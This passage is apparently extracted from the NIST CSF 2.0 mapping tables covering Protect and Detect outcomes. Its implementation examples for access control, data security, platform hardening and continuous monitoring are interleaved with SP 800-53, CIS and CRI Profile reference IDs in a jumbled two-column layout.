SP 800-53 Rev 5.1.1: AC-01
SP 800-53 Rev 5.1.1: AT-01
SP 800-53 Rev 5.1.1: AU-01
SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: CA-02
SP 800-53 Rev 5.1.1: CA-05
SP 800-53 Rev 5.1.1: CA-07
SP 800-53 Rev 5.1.1: CA-08
CSF 2.0 Page 111 of 145

Ex1: Establish contingency plans (e.g., CRI Profile v2.0: ID.IM-04
incident response, business continuity, CRI Profile v2.0: ID.IM-04.01
disaster recovery) for responding to and CRI Profile v2.0: ID.IM-04.02
recovering from adverse events that can CRI Profile v2.0: ID.IM-04.03
interfere with operations, expose CRI Profile v2.0: ID.IM-04.04
confidential information, or otherwise CRI Profile v2.0: ID.IM-04.05
endanger the organization's mission and CRI Profile v2.0: ID.IM-04.06
viability CRI Profile v2.0: ID.IM-04.07
Ex2: Include contact and communication CRI Profile v2.0: ID.IM-04.08
information, processes for handling CSF v1.1: PR.IP-9
common scenarios, and criteria for CSF v1.1: RS.IM-1
prioritization, escalation, and elevation in CSF v1.1: RC.IM-1
all contingency plans CSF v1.1: PR.IP-10
Ex3: Create a vulnerability management SP 800-221A: MA.RR-4
plan to identify and assess all types of SP 800-221A: MA.IM-1
vulnerabilities and to prioritize, test, and SP 800-53 Rev 5.1.1: CP-02
implement risk responses SP 800-53 Rev 5.1.1: IR-08
Ex4: Communicate cybersecurity plans SP 800-53 Rev 5.1.1: PL-02
(including updates) to those responsible for SP 800-53 Rev 5.1.1: SR-02
carrying them out and to affected parties
Ex5: Review and update all cybersecurity
plans annually or when a need for
significant improvements is identified
CRI Profile v2.0: PR

CSF v1.1: PR
CSF 2.0 Page 112 of 145

CRI Profile v2.0: PR.AA
CSF v1.1: PR.AC
Ex1: Initiate requests for new access or CIS Controls v8.0: 5.1
additional access for employees, CIS Controls v8.0: 6.7
contractors, and others, and track, review, CRI Profile v2.0: PR.AA-01
and fulfill the requests, with permission CRI Profile v2.0: PR.AA-01.01
from system or data owners when needed CRI Profile v2.0: PR.AA-01.02
Ex2: Issue, manage, and revoke CSF v1.1: PR.AC-1
cryptographic certificates and identity SP 800-53 Rev 5.1.1: AC-01
tokens, cryptographic keys (i.e., key SP 800-53 Rev 5.1.1: AC-02
management), and other credentials SP 800-53 Rev 5.1.1: AC-14
Ex3: Select a unique identifier for each SP 800-53 Rev 5.1.1: IA-01
device from immutable hardware SP 800-53 Rev 5.1.1: IA-02
characteristics or an identifier securely SP 800-53 Rev 5.1.1: IA-03
provisioned to the device SP 800-53 Rev 5.1.1: IA-04
Ex4: Physically label authorized hardware SP 800-53 Rev 5.1.1: IA-05
with an identifier for inventory and SP 800-53 Rev 5.1.1: IA-06
servicing purposes SP 800-53 Rev 5.1.1: IA-07
SP 800-53 Rev 5.1.1: IA-08
SP 800-53 Rev 5.1.1: IA-09
SP 800-53 Rev 5.1.1: IA-10
SP 800-53 Rev 5.1.1: IA-11
CSF 2.0 Page 113 of 145

Ex1: Verify a person's claimed identity at CRI Profile v2.0: PR.AA-02
enrollment time using government-issued CRI Profile v2.0: PR.AA-02.01
identity credentials (e.g., passport, visa, CSF v1.1: PR.AC-6
driver's license) SP 800-53 Rev 5.1.1: IA-12
Ex2: Issue a different credential for each
person (i.e., no credential sharing)
Ex1: Require multifactor authentication CRI Profile v2.0: PR.AA-03

Ex2: Enforce policies for the minimum CRI Profile v2.0: PR.AA-03.01
strength of passwords, PINs, and similar CRI Profile v2.0: PR.AA-03.02
authenticators CRI Profile v2.0: PR.AA-03.03
Ex3: Periodically reauthenticate users, CSF v1.1: PR.AC-3
services, and hardware based on risk (e.g., CSF v1.1: PR.AC-7
in zero trust architectures) SP 800-218: PO.5.2
Ex4: Ensure that authorized personnel can SP 800-53 Rev 5.1.1: AC-07
access accounts essential for protecting SP 800-53 Rev 5.1.1: AC-12
safety under emergency conditions SP 800-53 Rev 5.1.1: IA-02
SP 800-53 Rev 5.1.1: IA-03
SP 800-53 Rev 5.1.1: IA-05
SP 800-53 Rev 5.1.1: IA-07
SP 800-53 Rev 5.1.1: IA-08
SP 800-53 Rev 5.1.1: IA-09
SP 800-53 Rev 5.1.1: IA-10
SP 800-53 Rev 5.1.1: IA-11
CSF 2.0 Page 114 of 145

Ex1: Protect identity assertions that are CRI Profile v2.0: PR.AA-04
used to convey authentication and user CRI Profile v2.0: PR.AA-04.01
information through single sign-on systems SP 800-53 Rev 5.1.1: IA-13
Ex2: Protect identity assertions that are
used to convey authentication and user
information between federated systems
Ex3: Implement standards-based
approaches for identity assertions in all
contexts, and follow all guidance for the
generation (e.g., data models, metadata),
protection (e.g., digital signing, encryption),
and verification (e.g., signature validation)
of identity assertions
CSF 2.0 Page 115 of 145

Ex1: Review logical and physical access CIS Controls v8.0: 3.3
privileges periodically and whenever CIS Controls v8.0: 6.8
someone changes roles or leaves the CRI Profile v2.0: PR.AA-05
organization, and promptly rescind CRI Profile v2.0: PR.AA-05.01
privileges that are no longer needed CRI Profile v2.0: PR.AA-05.02
Ex2: Take attributes of the requester and CRI Profile v2.0: PR.AA-05.03
the requested resource into account for CRI Profile v2.0: PR.AA-05.04
authorization decisions (e.g., geolocation, CSF v1.1: PR.AC-1
day/time, requester endpoint's cyber CSF v1.1: PR.AC-3
health) CSF v1.1: PR.AC-4
Ex3: Restrict access and privileges to the SP 800-218: PO.5.2
minimum necessary (e.g., zero trust SP 800-218: PS.1.1
architecture) SP 800-53 Rev 5.1.1: AC-01
Ex4: Periodically review the privileges SP 800-53 Rev 5.1.1: AC-02
associated with critical business functions SP 800-53 Rev 5.1.1: AC-03
to confirm proper separation of duties SP 800-53 Rev 5.1.1: AC-05
SP 800-53 Rev 5.1.1: AC-06
SP 800-53 Rev 5.1.1: AC-10
SP 800-53 Rev 5.1.1: AC-16
SP 800-53 Rev 5.1.1: AC-17
SP 800-53 Rev 5.1.1: AC-18
SP 800-53 Rev 5.1.1: AC-19
SP 800-53 Rev 5.1.1: AC-24
SP 800-53 Rev 5.1.1: IA-13
CSF 2.0 Page 116 of 145

Ex1: Use security guards, security cameras, CRI Profile v2.0: PR.AA-06
locked entrances, alarm systems, and other CRI Profile v2.0: PR.AA-06.01
physical controls to monitor facilities and CRI Profile v2.0: PR.AA-06.02
restrict access CSF v1.1: PR.AC-2
Ex2: Employ additional physical security CSF v1.1: PR.PT-4
controls for areas that contain high-risk SP 800-218: PO.5.2
assets SP 800-53 Rev 5.1.1: PE-02
Ex3: Escort guests, vendors, and other third SP 800-53 Rev 5.1.1: PE-03
parties within areas that contain business- SP 800-53 Rev 5.1.1: PE-04
critical assets SP 800-53 Rev 5.1.1: PE-05
SP 800-53 Rev 5.1.1: PE-06
SP 800-53 Rev 5.1.1: PE-08
SP 800-53 Rev 5.1.1: PE-18
SP 800-53 Rev 5.1.1: PE-19
SP 800-53 Rev 5.1.1: PE-20
CRI Profile v2.0: PR.AT

CSF v1.1: PR.AT
SP 800-218: PO.2.2
CSF 2.0 Page 117 of 145

Ex1: Provide basic cybersecurity awareness CIS Controls v8.0: 14.1
and training to employees, contractors, CRI Profile v2.0: PR.AT-01
partners, suppliers, and all other users of CRI Profile v2.0: PR.AT-01.01
the organization's non-public resources CRI Profile v2.0: PR.AT-01.02
Ex2: Train personnel to recognize social CRI Profile v2.0: PR.AT-01.03
engineering attempts and other common CRI Profile v2.0: PR.AT-01.04
attacks, report attacks and suspicious CSF v1.1: PR.AT-1
activity, comply with acceptable use CSF v1.1: PR.AT-3
policies, and perform basic cyber hygiene CSF v1.1: RS.CO-1
tasks (e.g., patching software, choosing SP 800-218: PO.2.2
passwords, protecting credentials) SP 800-221A: GV.CT-3
Ex3: Explain the consequences of SP 800-221A: GV.RR-2
cybersecurity policy violations, both to SP 800-53 Rev 5.1.1: AT-02
individual users and the organization as a SP 800-53 Rev 5.1.1: AT-03
whole
Ex4: Periodically assess or test users on
their understanding of basic cybersecurity
practices
Ex5: Require annual refreshers to reinforce
existing practices and introduce new
practices
CSF 2.0 Page 118 of 145

Ex1: Identify the specialized roles within the CIS Controls v8.0: 14.9
organization that require additional CRI Profile v2.0: PR.AT-02
cybersecurity training, such as physical and CRI Profile v2.0: PR.AT-02.01
cybersecurity personnel, finance personnel, CRI Profile v2.0: PR.AT-02.02
senior leadership, and anyone with access CRI Profile v2.0: PR.AT-02.03
to business-critical data CRI Profile v2.0: PR.AT-02.04
Ex2: Provide role-based cybersecurity CRI Profile v2.0: PR.AT-02.05
awareness and training to all those in CRI Profile v2.0: PR.AT-02.06
specialized roles, including contractors, CRI Profile v2.0: PR.AT-02.07
partners, suppliers, and other third parties CRI Profile v2.0: PR.AT-02.08
Ex3: Periodically assess or test users on CSF v1.1: PR.AT-2
their understanding of cybersecurity CSF v1.1: PR.AT-3
practices for their specialized roles CSF v1.1: PR.AT-4
Ex4: Require annual refreshers to reinforce CSF v1.1: PR.AT-5
existing practices and introduce new SP 800-218: PO.2.2
practices SP 800-221A: GV.CT-3
SP 800-221A: GV.CT-4
SP 800-221A: GV.RR-2
SP 800-53 Rev 5.1.1: AT-03
CRI Profile v2.0: PR.DS

CSF v1.1: PR.DS
CSF 2.0 Page 119 of 145

Ex1: Use encryption, digital signatures, and CIS Controls v8.0: 3.11
cryptographic hashes to protect the CRI Profile v2.0: PR.DS-01
confidentiality and integrity of stored data CRI Profile v2.0: PR.DS-01.01
in files, databases, virtual machine disk CRI Profile v2.0: PR.DS-01.02
images, container images, and other CRI Profile v2.0: PR.DS-01.03
resources CSF v1.1: PR.DS-1
Ex2: Use full disk encryption to protect data CSF v1.1: PR.DS-5
stored on user endpoints CSF v1.1: PR.DS-6
Ex3: Confirm the integrity of software by CSF v1.1: PR.PT-2
validating signatures SP 800-218: PS.1.1
Ex4: Restrict the use of removable media to SP 800-218: PS.2.1
prevent data exfiltration SP 800-218: PS.3.1
Ex5: Physically secure removable media SP 800-53 Rev 5.1.1: CA-03
containing unencrypted sensitive SP 800-53 Rev 5.1.1: CP-09
information, such as within locked offices or SP 800-53 Rev 5.1.1: MP-08
file cabinets SP 800-53 Rev 5.1.1: SC-04
SP 800-53 Rev 5.1.1: SC-07
SP 800-53 Rev 5.1.1: SC-12
SP 800-53 Rev 5.1.1: SC-13
SP 800-53 Rev 5.1.1: SC-28
SP 800-53 Rev 5.1.1: SC-32
SP 800-53 Rev 5.1.1: SC-39
SP 800-53 Rev 5.1.1: SC-43
SP 800-53 Rev 5.1.1: SI-03
SP 800-53 Rev 5.1.1: SI-04
SP 800-53 Rev 5.1.1: SI-07
CSF 2.0 Page 120 of 145

Ex1: Use encryption, digital signatures, and CIS Controls v8.0: 3.10
cryptographic hashes to protect the CRI Profile v2.0: PR.DS-02
confidentiality and integrity of network CRI Profile v2.0: PR.DS-02.01
communications CSF v1.1: PR.DS-2
Ex2: Automatically encrypt or block CSF v1.1: PR.DS-5
outbound emails and other SP 800-53 Rev 5.1.1: AU-16
communications that contain sensitive SP 800-53 Rev 5.1.1: CA-03
data, depending on the data classification SP 800-53 Rev 5.1.1: SC-04
Ex3: Block access to personal email, file SP 800-53 Rev 5.1.1: SC-07
sharing, file storage services, and other SP 800-53 Rev 5.1.1: SC-08
personal communications applications and SP 800-53 Rev 5.1.1: SC-11
services from organizational systems and SP 800-53 Rev 5.1.1: SC-12
networks SP 800-53 Rev 5.1.1: SC-13
Ex4: Prevent reuse of sensitive data from SP 800-53 Rev 5.1.1: SC-16
production environments (e.g., customer SP 800-53 Rev 5.1.1: SC-40
records) in development, testing, and other SP 800-53 Rev 5.1.1: SC-43
non-production environments SP 800-53 Rev 5.1.1: SI-03
SP 800-53 Rev 5.1.1: SI-04
SP 800-53 Rev 5.1.1: SI-07
CSF 2.0 Page 121 of 145

Ex1: Remove data that must remain CRI Profile v2.0: PR.DS-10
confidential (e.g., from processors and CRI Profile v2.0: PR.DS-10.01
memory) as soon as it is no longer needed CSF v1.1: PR.DS-5
Ex2: Protect data in use from access by SP 800-53 Rev 5.1.1: AC-02
other users and processes of the same SP 800-53 Rev 5.1.1: AC-03
platform SP 800-53 Rev 5.1.1: AC-04
SP 800-53 Rev 5.1.1: AU-09
SP 800-53 Rev 5.1.1: AU-13
SP 800-53 Rev 5.1.1: CA-03
SP 800-53 Rev 5.1.1: CP-09
SP 800-53 Rev 5.1.1: SA-08
SP 800-53 Rev 5.1.1: SC-04
SP 800-53 Rev 5.1.1: SC-07
SP 800-53 Rev 5.1.1: SC-11
SP 800-53 Rev 5.1.1: SC-13
SP 800-53 Rev 5.1.1: SC-24
SP 800-53 Rev 5.1.1: SC-32
SP 800-53 Rev 5.1.1: SC-39
SP 800-53 Rev 5.1.1: SC-40
SP 800-53 Rev 5.1.1: SC-43
SP 800-53 Rev 5.1.1: SI-03
SP 800-53 Rev 5.1.1: SI-04
SP 800-53 Rev 5.1.1: SI-07
SP 800-53 Rev 5.1.1: SI-10
SP 800-53 Rev 5.1.1: SI-16
CSF 2.0 Page 122 of 145

Ex1: Continuously back up critical data in CIS Controls v8.0: 11.2
near-real-time, and back up other data CIS Controls v8.0: 11.3
frequently at agreed-upon schedules CIS Controls v8.0: 11.5
Ex2: Test backups and restores for all types CRI Profile v2.0: PR.DS-11
of data sources at least annually CRI Profile v2.0: PR.DS-11.01
Ex3: Securely store some backups offline CSF v1.1: PR.IP-4
and offsite so that an incident or disaster SP 800-218: PS.3.1
will not damage them SP 800-53 Rev 5.1.1: CP-06
Ex4: Enforce geographic separation and SP 800-53 Rev 5.1.1: CP-09
geolocation restrictions for data backup
storage
CRI Profile v2.0: PR.PS
CSF 2.0 Page 123 of 145

Ex1: Establish, test, deploy, and maintain CIS Controls v8.0: 4.1
hardened baselines that enforce the CIS Controls v8.0: 4.2
organization's cybersecurity policies and CRI Profile v2.0: PR.PS-01
provide only essential capabilities (i.e., CRI Profile v2.0: PR.PS-01.01
principle of least functionality) CRI Profile v2.0: PR.PS-01.02
Ex2: Review all default configuration CRI Profile v2.0: PR.PS-01.03
settings that may potentially impact CRI Profile v2.0: PR.PS-01.04
cybersecurity when installing or upgrading CRI Profile v2.0: PR.PS-01.05
software CRI Profile v2.0: PR.PS-01.06
Ex3: Monitor implemented software for CRI Profile v2.0: PR.PS-01.07
deviations from approved baselines CRI Profile v2.0: PR.PS-01.08
CRI Profile v2.0: PR.PS-01.09
CSF v1.1: PR.IP-1
CSF v1.1: PR.IP-3
CSF v1.1: PR.PT-2
CSF v1.1: PR.PT-3
SP 800-218: PO.5.2
SP 800-218: PS.1.1
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CM-02
SP 800-53 Rev 5.1.1: CM-03
SP 800-53 Rev 5.1.1: CM-04
SP 800-53 Rev 5.1.1: CM-05
SP 800-53 Rev 5.1.1: CM-06
SP 800-53 Rev 5.1.1: CM-07
SP 800-53 Rev 5.1.1: CM-08
SP 800-53 Rev 5.1.1: CM-09
SP 800-53 Rev 5.1.1: CM-10
SP 800-53 Rev 5.1.1: CM-11
CSF 2.0 Page 124 of 145

Ex1: Perform routine and emergency CIS Controls v8.0: 2.2
patching within the timeframes specified in CIS Controls v8.0: 2.3
the vulnerability management plan CRI Profile v2.0: PR.PS-02
Ex2: Update container images, and deploy CRI Profile v2.0: PR.PS-02.01
new container instances to replace rather CRI Profile v2.0: PR.PS-02.02
than update existing instances CRI Profile v2.0: PR.PS-02.03
Ex3: Replace end-of-life software and CSF v1.1: PR.IP-12
service versions with supported, CSF v1.1: PR.MA-2
maintained versions SP 800-218: PO.5.2
Ex4: Uninstall and remove unauthorized SP 800-53 Rev 5.1.1: CM-11
software and services that pose undue risks SP 800-53 Rev 5.1.1: MA-03(06)
Ex5: Uninstall and remove any unnecessary SP 800-53 Rev 5.1.1: SA-10(01)
software components (e.g., operating SP 800-53 Rev 5.1.1: SI-02
system utilities) that attackers might misuse SP 800-53 Rev 5.1.1: SI-07
Ex6: Define and implement plans for
software and service end-of-life
maintenance support and obsolescence
CSF 2.0 Page 125 of 145

Ex1: Replace hardware when it lacks CIS Controls v8.0: 1.2
needed security capabilities or when it CRI Profile v2.0: PR.PS-03
cannot support software with needed CRI Profile v2.0: PR.PS-03.01
security capabilities CSF v1.1: PR.MA-1
Ex2: Define and implement plans for CSF v1.1: PR.DS-3
hardware end-of-life maintenance support SP 800-218: PO.5.2
and obsolescence SP 800-53 Rev 5.1.1: CM-07(09)
Ex3: Perform hardware disposal in a secure, SP 800-53 Rev 5.1.1: SA-10(03)
responsible, and auditable manner SP 800-53 Rev 5.1.1: SC-03(01)
SP 800-53 Rev 5.1.1: SC-39(01)
SP 800-53 Rev 5.1.1: SC-49
SP 800-53 Rev 5.1.1: SC-51
Ex1: Configure all operating systems, CIS Controls v8.0: 8.2

applications, and services (including cloud- CRI Profile v2.0: PR.PS-04
based services) to generate log records CRI Profile v2.0: PR.PS-04.01
Ex2: Configure log generators to securely CRI Profile v2.0: PR.PS-04.02
share their logs with the organization's CRI Profile v2.0: PR.PS-04.03
logging infrastructure systems and services CSF v1.1: PR.PT-1
Ex3: Configure log generators to record the SP 800-218: PO.3.3
data needed by zero-trust architectures SP 800-53 Rev 5.1.1: AU-02
SP 800-53 Rev 5.1.1: AU-03
SP 800-53 Rev 5.1.1: AU-06
SP 800-53 Rev 5.1.1: AU-07
SP 800-53 Rev 5.1.1: AU-11
SP 800-53 Rev 5.1.1: AU-12
CSF 2.0 Page 126 of 145

Ex1: When risk warrants it, restrict software CIS Controls v8.0: 2.5
execution to permitted products only or CRI Profile v2.0: PR.PS-05
deny the execution of prohibited and CRI Profile v2.0: PR.PS-05.01
unauthorized software CRI Profile v2.0: PR.PS-05.02
Ex2: Verify the source of new software and CRI Profile v2.0: PR.PS-05.03
the software's integrity before installing it SP 800-53 Rev 5.1.1: CM-07(02)
Ex3: Configure platforms to use only SP 800-53 Rev 5.1.1: CM-07(04)
approved DNS services that block access to SP 800-53 Rev 5.1.1: CM-07(05)
known malicious domains SP 800-53 Rev 5.1.1: SC-34
Ex4: Configure platforms to allow the
installation of organization-approved
software only
Ex1: Protect all components of CIS Controls v8.0: 16.1

organization-developed software from CRI Profile v2.0: PR.PS-06
tampering and unauthorized access CRI Profile v2.0: PR.PS-06.01
Ex2: Secure all software produced by the CRI Profile v2.0: PR.PS-06.02
organization, with minimal vulnerabilities in CRI Profile v2.0: PR.PS-06.03
their releases CRI Profile v2.0: PR.PS-06.04
Ex3: Maintain the software used in CRI Profile v2.0: PR.PS-06.05
production environments, and securely CRI Profile v2.0: PR.PS-06.06
dispose of software once it is no longer CRI Profile v2.0: PR.PS-06.07
needed CRI Profile v2.0: PR.PS-06.08
CSF v1.1: PR.IP-2
SP 800-53 Rev 5.1.1: SA-03
SP 800-53 Rev 5.1.1: SA-08
SP 800-53 Rev 5.1.1: SA-10
SP 800-53 Rev 5.1.1: SA-11
SP 800-53 Rev 5.1.1: SA-15
SP 800-53 Rev 5.1.1: SA-17
CSF 2.0 Page 127 of 145

CRI Profile v2.0: PR.IR
Ex1: Logically segment organization CIS Controls v8.0: 3.12

networks and cloud-based platforms CIS Controls v8.0: 12.2
according to trust boundaries and platform CRI Profile v2.0: PR.IR-01
types (e.g., IT, IoT, OT, mobile, guests), and CRI Profile v2.0: PR.IR-01.01
permit required communications only CRI Profile v2.0: PR.IR-01.02
between segments CRI Profile v2.0: PR.IR-01.03
Ex2: Logically segment organization CRI Profile v2.0: PR.IR-01.04
networks from external networks, and CRI Profile v2.0: PR.IR-01.05
permit only necessary communications to CRI Profile v2.0: PR.IR-01.06
enter the organization's networks from the CRI Profile v2.0: PR.IR-01.07
external networks CRI Profile v2.0: PR.IR-01.08
Ex3: Implement zero trust architectures to CSF v1.1: PR.AC-3
restrict network access to each resource to CSF v1.1: PR.AC-5
the minimum necessary CSF v1.1: PR.DS-7
Ex4: Check the cyber health of endpoints CSF v1.1: PR.PT-4
before allowing them to access and use SP 800-218: PO.5.1
production resources SP 800-53 Rev 5.1.1: AC-03
SP 800-53 Rev 5.1.1: AC-04
SP 800-53 Rev 5.1.1: SC-04
SP 800-53 Rev 5.1.1: SC-05
SP 800-53 Rev 5.1.1: SC-07
CSF 2.0 Page 128 of 145

Ex1: Protect organizational equipment from CRI Profile v2.0: PR.IR-02
known environmental threats, such as CRI Profile v2.0: PR.IR-02.01
flooding, fire, wind, and excessive heat and CSF v1.1: PR.IP-5
humidity SP 800-53 Rev 5.1.1: CP-02
Ex2: Include protection from environmental SP 800-53 Rev 5.1.1: PE-09
threats and provisions for adequate SP 800-53 Rev 5.1.1: PE-10
operating infrastructure in requirements for SP 800-53 Rev 5.1.1: PE-11
service providers that operate systems on SP 800-53 Rev 5.1.1: PE-12
the organization's behalf SP 800-53 Rev 5.1.1: PE-13
SP 800-53 Rev 5.1.1: PE-14
SP 800-53 Rev 5.1.1: PE-15
SP 800-53 Rev 5.1.1: PE-18
SP 800-53 Rev 5.1.1: PE-23
Ex1: Avoid single points of failure in CRI Profile v2.0: PR.IR-03

systems and infrastructure CRI Profile v2.0: PR.IR-03.01
Ex2: Use load balancing to increase capacity CSF v1.1: PR.PT-5
and improve reliability SP 800-53 Rev 5.1.1: CP
Ex3: Use high-availability components like SP 800-53 Rev 5.1.1: IR
redundant storage and power supplies to SP 800-53 Rev 5.1.1: SA-08
improve system reliability SP 800-53 Rev 5.1.1: SC-06
SP 800-53 Rev 5.1.1: SC-24
SP 800-53 Rev 5.1.1: SC-36
SP 800-53 Rev 5.1.1: SC-39
SP 800-53 Rev 5.1.1: SI-13
Ex1: Monitor usage of storage, power, CRI Profile v2.0: PR.IR-04

compute, network bandwidth, and other CRI Profile v2.0: PR.IR-04.01
resources CRI Profile v2.0: PR.IR-04.02
Ex2: Forecast future needs, and scale CSF v1.1: PR.DS-4
resources accordingly SP 800-53 Rev 5.1.1: CP-06
SP 800-53 Rev 5.1.1: CP-07
SP 800-53 Rev 5.1.1: CP-08
SP 800-53 Rev 5.1.1: PM-03
SP 800-53 Rev 5.1.1: PM-09
CSF 2.0 Page 129 of 145

CRI Profile v2.0: DE

CSF v1.1: DE
CRI Profile v2.0: DE.CM

CSF v1.1: DE.CM
Ex1: Monitor DNS, BGP, and other network CIS Controls v8.0: 13.1
services for adverse events CRI Profile v2.0: DE.CM-01
Ex2: Monitor wired and wireless networks CRI Profile v2.0: DE.CM-01.01
for connections from unauthorized CRI Profile v2.0: DE.CM-01.02
endpoints CRI Profile v2.0: DE.CM-01.03
Ex3: Monitor facilities for unauthorized or CRI Profile v2.0: DE.CM-01.04
rogue wireless networks CRI Profile v2.0: DE.CM-01.05
Ex4: Compare actual network flows against CRI Profile v2.0: DE.CM-01.06
baselines to detect deviations CSF v1.1: DE.CM-1
Ex5: Monitor network communications to CSF v1.1: DE.CM-4
identify changes in security postures for CSF v1.1: DE.CM-5
zero trust purposes CSF v1.1: DE.CM-7
SP 800-53 Rev 5.1.1: AC-02
SP 800-53 Rev 5.1.1: AU-12
SP 800-53 Rev 5.1.1: CA-07
SP 800-53 Rev 5.1.1: CM-03
SP 800-53 Rev 5.1.1: SC-05
SP 800-53 Rev 5.1.1: SC-07
SP 800-53 Rev 5.1.1: SI-04
CSF 2.0 Page 130 of 145

Ex1: Monitor logs from physical access CRI Profile v2.0: DE.CM-02
control systems (e.g., badge readers) to find CRI Profile v2.0: DE.CM-02.01
unusual access patterns (e.g., deviations CSF v1.1: DE.CM-2
from the norm) and failed access attempts SP 800-53 Rev 5.1.1: CA-07
Ex2: Review and monitor physical access SP 800-53 Rev 5.1.1: PE-03
records (e.g., from visitor registration, sign- SP 800-53 Rev 5.1.1: PE-06
in sheets) SP 800-53 Rev 5.1.1: PE-20
Ex3: Monitor physical access controls (e.g.,
locks, latches, hinge pins, alarms) for signs
of tampering
Ex4: Monitor the physical environment
using alarm systems, cameras, and security
guards
Ex1: Use behavior analytics software to CIS Controls v8.0: 10.7

detect anomalous user activity to mitigate CRI Profile v2.0: DE.CM-03
insider threats CRI Profile v2.0: DE.CM-03.01
Ex2: Monitor logs from logical access CRI Profile v2.0: DE.CM-03.02
control systems to find unusual access CRI Profile v2.0: DE.CM-03.03
patterns and failed access attempts CSF v1.1: DE.CM-3
Ex3: Continuously monitor deception CSF v1.1: DE.CM-7
technology, including user accounts, for any SP 800-53 Rev 5.1.1: AC-02
usage SP 800-53 Rev 5.1.1: AU-12
SP 800-53 Rev 5.1.1: AU-13
SP 800-53 Rev 5.1.1: CA-07
SP 800-53 Rev 5.1.1: CM-10
SP 800-53 Rev 5.1.1: CM-11
CSF 2.0 Page 131 of 145

Ex1: Monitor remote and onsite CIS Controls v8.0: 15.2
administration and maintenance activities CIS Controls v8.0: 15.6
that external providers perform on CRI Profile v2.0: DE.CM-06
organizational systems CRI Profile v2.0: DE.CM-06.01
Ex2: Monitor activity from cloud-based CRI Profile v2.0: DE.CM-06.02
services, internet service providers, and CSF v1.1: DE.CM-6
other service providers for deviations from CSF v1.1: DE.CM-7
expected behavior SP 800-53 Rev 5.1.1: CA-07
SP 800-53 Rev 5.1.1: PS-07
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SI-04
CSF 2.0 Page 132 of 145

Ex1: Monitor email, web, file sharing, CIS Controls v8.0: 10.1
collaboration services, and other common CRI Profile v2.0: DE.CM-09
attack vectors to detect malware, phishing, CRI Profile v2.0: DE.CM-09.01
data leaks and exfiltration, and other CRI Profile v2.0: DE.CM-09.02
adverse events CRI Profile v2.0: DE.CM-09.03
Ex2: Monitor authentication attempts to CSF v1.1: PR.DS-6
identify attacks against credentials and CSF v1.1: PR.DS-8
unauthorized credential reuse CSF v1.1: DE.CM-4
Ex3: Monitor software configurations for CSF v1.1: DE.CM-5
deviations from security baselines CSF v1.1: DE.CM-7
Ex4: Monitor hardware and software for SP 800-53 Rev 5.1.1: AC-04
signs of tampering SP 800-53 Rev 5.1.1: AC-09
Ex5: Use technologies with a presence on SP 800-53 Rev 5.1.1: AU-12
endpoints to detect cyber health issues SP 800-53 Rev 5.1.1: CA-07
(e.g., missing patches, malware infections, SP 800-53 Rev 5.1.1: CM-03
unauthorized software), and redirect the SP 800-53 Rev 5.1.1: CM-06
endpoints to a remediation environment SP 800-53 Rev 5.1.1: CM-10
before access is authorized SP 800-53 Rev 5.1.1: CM-11
SP 800-53 Rev 5.1.1: SC-34
SP 800-53 Rev 5.1.1: SC-35
SP 800-53 Rev 5.1.1: SI-04
SP 800-53 Rev 5.1.1: SI-07
CRI Profile v2.0: DE.AE

CSF v1.1: DE.AE
CSF v1.1: DE.DP-2
CSF 2.0 Page 133 of 145

Ex1: Use security information and event CIS Controls v8.0: 8.11
management (SIEM) or other tools to CRI Profile v2.0: DE.AE-02
continuously monitor log events for known CRI Profile v2.0: DE.AE-02.01
malicious and suspicious activity CRI Profile v2.0: DE.AE-02.02
Ex2: Utilize up-to-date cyber threat CSF v1.1: DE.AE-2
intelligence in log analysis tools to improve SP 800-53 Rev 5.1.1: AU-06
detection accuracy and characterize threat SP 800-53 Rev 5.1.1: CA-07
actors, their methods, and indicators of SP 800-53 Rev 5.1.1: IR-04
compromise SP 800-53 Rev 5.1.1: SI-04
Ex3: Regularly conduct manual reviews of
log events for technologies that cannot be
sufficiently monitored through automation
Ex4: Use log analysis tools to generate
reports on their findings
Ex1: Constantly transfer log data generated CRI Profile v2.0: DE.AE-03
by other sources to a relatively small CRI Profile v2.0: DE.AE-03.01
number of log servers CRI Profile v2.0: DE.AE-03.02
Ex2: Use event correlation technology (e.g., CSF v1.1: DE.AE-3
SIEM) to collect information captured by SP 800-53 Rev 5.1.1: AU-06
multiple sources SP 800-53 Rev 5.1.1: CA-07
Ex3: Utilize cyber threat intelligence to help SP 800-53 Rev 5.1.1: PM-16
correlate events among log sources SP 800-53 Rev 5.1.1: IR-04
SP 800-53 Rev 5.1.1: IR-05
SP 800-53 Rev 5.1.1: IR-08
SP 800-53 Rev 5.1.1: SI-04
CSF 2.0 Page 134 of 145

Ex1: Use SIEMs or other tools to estimate CRI Profile v2.0: DE.AE-04
impact and scope, and review and refine CRI Profile v2.0: DE.AE-04.01
the estimates CSF v1.1: DE.AE-4
Ex2: A person creates their own estimates SP 800-53 Rev 5.1.1: PM-09
of impact and scope SP 800-53 Rev 5.1.1: PM-11
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-28
SP 800-53 Rev 5.1.1: PM-30
Ex1: Use cybersecurity software to generate CRI Profile v2.0: DE.AE-06

alerts and provide them to the security CRI Profile v2.0: DE.AE-06.01
operations center (SOC), incident CSF v1.1: DE.DP-4
responders, and incident response tools SP 800-53 Rev 5.1.1: IR-04
Ex2: Incident responders and other SP 800-53 Rev 5.1.1: PM-15
authorized personnel can access log SP 800-53 Rev 5.1.1: PM-16
analysis findings at all times SP 800-53 Rev 5.1.1: RA-04
Ex3: Automatically create and assign tickets SP 800-53 Rev 5.1.1: RA-10
in the organization's ticketing system when
certain types of alerts occur
Ex4: Manually create and assign tickets in
the organization's ticketing system when
technical staff discover indicators of
compromise
